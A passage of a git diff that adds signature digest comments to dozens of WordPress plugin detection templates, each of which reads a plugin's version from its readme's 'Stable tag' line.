a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1ee4179ac63dcd0a82d0f93e32ad7d666482ad2b3bf502547292fd9fe5242d9022100c555ff21d68bd3bb4c765aec59c109b238bc4c5097d59391410a48e17fceba14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e5326941673..f3ef99ecefe 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201db4386981d82774d640785177f9b1114112daa801aae15e723b6663443fed9c02204e295d792c195477aceb99e4e1b1876b5d1ea6bde1c07f93ba7ae6ce2bbeeb85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d6..d6ba9d21318 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220549df555dd9b8d2869da45b29758a1d683d36a4517db2d96d3b7c6dab2945ae30220658402cf750df9c38411b60af836fd000107992614a610750b0cc560919f16df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c3..4f50db89d78 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b5f1c9b9605cfd33422b1868bebc38b36274574b3e6547be3426a46095216ee022100b0fddf16f561e5a43331c0f46b9dca5f2b4a145447be0358591b0d4af8599cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a3..17444dd0a38 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d185987564ae952105685104b57a6d5f8bc812664e6f8c04511d53e78d450d0f02200cc80ad935abcbf0446a3064ccfe7c36861993fbc11400ba4f803c241da18fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179ee..9a68087d186 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055b0b4ba0682827ddc0e102002c00fd1344b4964f41c5ff7b375c7e59afa4bad022100d151e6ddcd00b2feda7f2cab0416e544b9ccf2d680fc17196b01451290160984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d139..43c845243d0 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206bb4e486d24688ffc3e485accf253f438eee3924b53478f871382b6a2fd697bf02205036cf64a015f6b33308ee5f24cfb171fafe38fa6954ae36eb1ba9a3515518ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f6..f71d0526366 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ffc816050bc85fa32757d0d626b7b14a81590f5eb556a6d750058badc1a111f0220048b013e6662c9c0253d45e7efd0e5d594901f9519456ee5663c0312dcb343c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924be..91791545dcf 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067b1d8659d2867d81252048118fa9d3c86c44a82d9440bab9dc3f04ae2ab7164022006738ba2bd5c98ad917f4eec9c24d020eb88afdc90d6448128f753d1d68b093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a39..3b8729cfdcf 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b81674d9e5b9208a84c3ed11ac4238cb6ec9e68f35b0edff29e19aa29bf09cf8022100c2c4bf2cefcfa0aa1016cfef4f34cab9bb97ec18a6c80b33176019a6399fae9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4a..30deff30d96 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220392b55cfa6ee518976f50485e430b88b80384a72677656b5005ba712c44cf272022054ce218a8d57f97981ebe1ed215ec4eee7fc09cd4a4c548f7c5e18d59f4e12ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545d..792fdea5d2d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c57caaa99c6bcfd41d26cb92c9e425b385401a251b203d8f32391d875cb32a1022100b6ee67b7daf5cf44465b22add78b22e721d20eb10baaf5d972e5f9069941b273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f181225..6732e5432db 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201517110ea05719397845c7ce6e1e98bb3f8341f76856f6e9097990ea6abf6651022100d2e1fe38a12d90f193fbbcdb1ed230f61233732f1487662ec1ff61440b25cd8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d5369..b4e56261db0 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ca9144917d0d1daf79f55c5022b9349472a491ddf4f763cb999238a5dbcc4c6022100a38b0d9601899a482733dd23b4e558b665f55306a1e7f82205ed219a4c55325d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1d..da0fd36d686 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e7540862122060819ca14df738ace969f2850d8f4a42829497dd1cfa25c1f869022049b37dece963ef7e48624c50185e2a36e0356755af88b8ac982e7f7a11326daf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc979..275adb1df54 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bbe01efb39e7ad193b346472b94c82c01fce74ca2c34a5925f0e7312ab18fb80221009e4b02e3843ac325e79bccd4dac34cde556378436999f68ca2f0d9f00f2a072e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f934..7f28b84c321 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028f649080a9517dc636202491236770e6b1ae79b3de94d87b43e0cb46a30d253022045224b2074d4a59179b32467a40569d9ea2d8af0d445af25933f8474609318c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf361..de6496bc3b9 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009824cbf2e620f5529522d82d4ce96cf876e50a36a20a071c9c3de1429e4e719802203f3e4c7b95dfd38176d015d6952287419bce57e9c0e45bc2127e4a776e411325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d26..538c0b58c2c 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203274fb12051d1ced5bc0640ae0e04cec2b0337a870373c706caacc9683fbd4f8022100f2142f5ad21deb9f575d108e67bfaaa2a949a55689f8de350b6b189c3974a17b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86e..92f7404db48 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc629b92579698ff75627ff18225bcac1cd9a1d686a87ed6873f8353c75ea70a022100ce7a98d39a5c7e42dc9d00daa73c76533c44865de933cc0923f593e73e51f77d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b6..4c2ce5afc85 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f22e51d35b67b9ef9655b4b7ae644ae738f092fe5c9c9e0accac8a815d845d500220361732a425ba8a1c325447616c8057dabf84600aa7892d1ee0f753c7764f74e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b0..0c67f7fb239 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0ff5f77455e35e57952d74914e9c9b4e06089c3a6a365ccacc4aee144c94620221009f9e1d938e5e75bb5a2bb12174863cae1b2693227244ee9a0c83725dd6c238d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566f..0664eb72de5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ecedecfd9bc4528c0356638e9f1154de677c456b282e9d4ccee14e728453f44022100e126859e9a2639d7ac7b0caa85d36f8ea5d9ba3bb88008b5656370f17e97a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a154..388616397a7 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100febd8d6716f43e2ea6b2efa0f761bad1bae36f6369a66266fe161521f091fa48022100b81414a7055c3eb4995a7904cdb1c17d3ccd2d5723303e1aa02aa90d6a9eff91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f2..c8a03efa844 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eac4762793ee00a31c934f831e078d720ce582c090f2fc84e1d11da904926fc2022100ca3efe22aa225b9f9b409270913e8b637dce2990259188c9585ec9b51b0bc6ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c920917673..a36711fc553 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3b84336c54d4daa03cba1da2fc110780a4b2b33e9703873977aa71ff71a29970220677fafeba9778b89c667f2f6b421758a5a325e1f10362b0c113186aa141ba178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9ce..9f224d17861 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0ecfc0d0eedf024024c155f6ef23860177818d6ce6b796256de6f801fca3523022100a2759d5f3289e6410ba4a68b55c98f22400cf120ad920ab8e9252f86f79feb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05e..1c55418ec96 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ec3b252dc313c84879431358491debdc4549bea050c14f38631466a66377862022100b4335e859913ce6eedc16b1dd4b8972066608920e058b20a471b211bdf017d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce34093..37fe866e292 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3d66c21537e5bfdf97f63496521715ccf1ede426d3d34d01dd64e02616193660221009fd41c1be766614b019840f04fd1322077387187345803b3ea5d6266cca72988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8dad..b8398f5380e 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe9af84b87b1d096ee7cf4f77fb599700827539dbfc6a98bc8df24388d835c7e022100a32efbe0b25aa2f45a7d1ed476e5530d7f0613b66af580c5db800cf9e111cc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eba..eec314b8191 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022037d1f9adb42a56408d45877309111be80c9e1ea1a2071cc3712b9420afce0bda0221009c59a6ca958a9998e8974527dd8826852483b3d1820848c1bb6d1c3469b8b78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df5..18ff4fda580 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe86f9cfdf9413c0173a51df30859d682001b966dda6bbfa0798effcd51daef7022052ce2076eed2e2f6cc1e3fed4206145508c31c587fce37ec707792953eea74bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73ed..7f8c1c9c2da 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf0fd5df95826032a570fb14ee61199698f1fc6e06cafbbf6fb232ba36745b70022025f14da710c483c2962a855b6729a7c136e4ed47ac3a11b50ca6747ef425cdb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f00931279..3e88c11b232 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220329411e72cc77ce4bb92d8830c96770302d71f4ba34cc2dbe36bad9395a19d57022100adb1c9223473f18750a62a73d21528cb6641c252f5dcfb0ffa546ce8a41eedcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d6..fc5926b6839 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220427d525182590bb3f8ac745e07d102823face1012a106e1bf04c7f02ce3f40a1022100e6a301fd32b4b96770adc41e49d991196ea642a63b1218a3ac3c3ed39d815b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d8..d3e5eb40855 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008eeb2eef1480f2c56fd74a6dd2558c2c4dfaebec330423b26a9da56270885a410220074fe5c44cce56d01c1726d545da980c160cb29a2b3081e1f31f1d1a461a2c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ace..f01d295b314 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bed7153b1cf96ee8aff072b5559a373e8b5de40a9dce419cec0ebedf6fa8fae0221008173cca62a1a5498b6894cf4e23c4f6165ea5187b5ef11d1209ae44579e050db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736fd..1fd265a7d32 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013ad14bdabc3a04dfd579b312a7653ed1e7d3fbb18321f9c10b38fd70df5d7ac0221008dfe5aa4008baee41dfd535d4f53e10c40b8ee85f37c96a041fa25f4fb37d9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b24789..8ab2a61ddb7 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebdb6d34d0003295ae3f15dc897e84396c62333946880e1ec1c542fcc96d03e40220027cf90b185886a8c4a989401bc0ae22c8152c86f23549e9bb3b3306e526d385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6d..a52ebd7f61f 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec9e0d25a32e9bafd4cc7f7524b8d2c5bf2ae1c532fd35e57afc319807ae79ae02207d4f08971a2a6f7814181d50c3c13210cab32a86c4eb5bd7f58866bc6c36b4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d578..d543e744734 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa52bbdb854a756b3eac5adfcb414798fb44ddf786a4fadb9ce954ee9c14a78c022100cafa945d170a9f7c7b586ad76f5d7df4d3f557d3c4f91e137336a1c118bd06cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a90..951eca51f56 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200baccfc18a9b4208e31b2df56ff600c5e9abd19773db3272d9653a02d6fe3cd3022100cc3445682fecc09f816496c44fb716133986528dfb7e8b4802a1802dc47e24a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415d..ca2e201af17 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220546b401130f46adf81812c4b98e02e7c8f94e35f1f774aaf9c7fde65bffc66c1022100a3445d167372612efedbd06a6629687134f3d545900ffcc3557728300a2819c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d2..6321c8eecd2 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204759f22cf1a14948d9e4641c16cd7a0b5ca5dcb6987a95aa3e20ccb1cf0a4910022100cc6bb60e8926e9491a0c6a468bb1eb9e87b917a3c0ffe6a0b3f94aa5d644b490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03c..dea53adb7e4 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204eae9133d28fc6644e60cdce4bd1353eb71f5888c73cc65c86c41b93f3df7918022100bd6de5d1b47b4fec5f418675c4e21361b0f965a8c1e78bc61283738c8e954cb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9c..f24b1a97d58 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220032edef101f859991abb1df1556f9b8d1b3ee9e3c0011dd5ef92773d63d42f68022073863b7d8eb3cd016c802311b7314109e9174e5787782b5af3a94db7d5b4a8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc670..d5f17611084 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da5c6572c8351f691bf0cc82b247e2ee6e1d162bec4c4f0daeafe23583c718c902203076b9877a6e61345192a9cafe4cb4fe6accddfa505a9fc3568bd2ea3a198550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 